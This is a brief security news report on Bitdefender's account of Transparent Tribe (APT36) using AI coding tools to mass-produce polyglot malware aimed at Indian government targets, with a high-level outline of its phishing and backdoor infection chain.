THE Pakistan-aligned threat actor known as Transparent Tribe has adopted AI-powered coding tools to mass-produce malware implants, aiming to flood target environments with disposable, polyglot binaries. According to Bitdefender, the activity focuses on generating a “high-volume, mediocre mass of implants” built with lesser-known languages such as Nim, Zig and Crystal, and utilises trusted services like Slack, Discord, Supabase and Google Sheets to evade detection.
The campaign is described as an AI-assisted shift toward malware industrialisation, rather than a leap in technical sophistication, with researchers noting that LLMs lower the barrier for threat actors to generate code across unfamiliar languages. The latest attacks have targeted the Indian government and its embassies in multiple countries, with APT36 using LinkedIn to identify high-value targets.
Infection chains reportedly begin with phishing via LNKs in ZIP or ISO archives, or PDF lures, leading to PowerShell execution and the deployment of backdoors such as Cobalt Strike and Havoc in a hybrid approach.